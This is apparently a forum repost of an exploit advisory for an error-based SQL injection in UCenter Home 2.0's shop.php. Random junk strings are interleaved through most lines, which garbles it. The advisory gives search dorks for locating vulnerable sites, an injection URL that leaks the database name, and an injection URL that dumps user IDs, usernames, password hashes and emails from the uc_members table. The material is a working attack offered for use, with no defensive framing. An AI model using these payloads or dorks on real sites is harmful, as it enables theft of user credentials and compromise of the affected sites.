7 u+ |/ P' e' Z, s1 ~
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
& n# H8 S" D6 r4 Z" x0 g9 G" X2 r9 x9 r ]+ j4 W1 Y! E8 d
1 I- U" x: M8 U) |1 S n9 l
5 ~" b" ~+ `; ?2 R+ b% x5 t*/ Author : KnocKout
7 S* d7 @" ?7 G% Y# S+ p6 p2 s$ Z) q/ N6 @
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers # S5 W i9 _' g. |- A s0 t
9 s, a0 m* k& W: ?2 R7 X*/ Contact: knockoutr@msn.com
2 ?* N2 ~+ _6 c; t
) n ]* g% t9 W% S5 V*/ Cyber-Warrior.org/CWKnocKout / f6 x* n/ z+ q; j5 \
# p$ e( y% ^6 j2 ]; W__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
, R- o6 b4 E$ Q2 c
( I* \: z# s0 u$ }6 i1 O& SScript : UCenter Home , |+ F! F( b- N5 m6 c
0 h! K" n, \9 e- g2 G# HVersion : 2.0
& C/ ]2 `- T q! O* y( M
, p, M; o- _# {/ r3 S4 z% C& P6 lScript HomePage : http://u.discuz.net/
! ~$ H, o- _1 T/ K! G$ N S) F% S& }6 G6 ]: C% D
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ' {3 B+ _* {* b. c, ~5 _0 t. I
, U- F% D5 q1 X5 J' ^
Dork : Powered by UCenter inurl:shop.php?ac=view
; {2 Z1 O1 A0 n
6 x6 e/ A V- M' g+ i& FDork 2 : inurl:shop.php?ac=view&shopid=
4 |4 V: A; \$ h2 U* }+ X/ x( u, P. [8 o& B0 @; c
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
' U3 n/ g& W$ w3 c/ i4 Q4 w- X* P9 A) X2 V, C
Vuln file : Shop.php
2 S) h8 Y# g/ R1 w+ q2 |' S2 y x
1 ]# S) {, m( X9 _: Rvalue's : (?)ac=view&shopid=
( y' x+ t3 v, x) y, G: M0 s0 G3 y3 S9 `. V5 D/ w. @
Vulnerable Style : SQL Injection (MySQL Error Based)
g$ K* p. h6 X4 A: j
9 y0 z, v3 H3 _Need Metarials : Hex Conversion
% r7 v. k1 X! F1 K& u8 h X6 O# B7 }3 i
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
; r" k3 F& L( y7 i L
% F) s/ D5 s8 j4 }/ a3 U; OYour Need victim Database name.
0 f! v! _) k6 c+ e- _2 a/ S
, D7 w: j" t4 ^6 b7 ]4 ?, |, tfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ' p# L: M% Z, ~. t1 |" s, [' H
+ T4 h6 d3 b# B" k# P" s
.. , q2 L) [# t5 K7 v
) s: y% }6 G, ^0 C9 t
DB : Okey.
9 e& J% M- O1 x. ]- J' u' e2 Y
- O ^2 G. }- u4 i1 O( S0 a5 ayour edit DB `[TARGET DB NAME]` 3 d: ^5 Z5 n8 S9 M; q' p
" ^! q5 a) ?/ {
Example : 'hiwir1_ucenter'
* J H( T! R% e2 U; D
$ p5 B( A; V& u2 N1 F, n: uEdit : Okey.
" z- ?" g6 [0 f$ e% X" ~5 J: n% w
Your use Hex conversion. And edit Your SQL Injection Exploit..
6 \/ L5 C2 `9 V. J3 [6 d. M
3 z! K5 m7 F, Q G e& d" n% r5 e# {- U1 l5 I8 v
6 Q$ r& L% ]. s3 ]' j! zExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
8 O. I$ K9 \3 I |
发表于 2013-2-27 21:31:31
收藏
支持
反对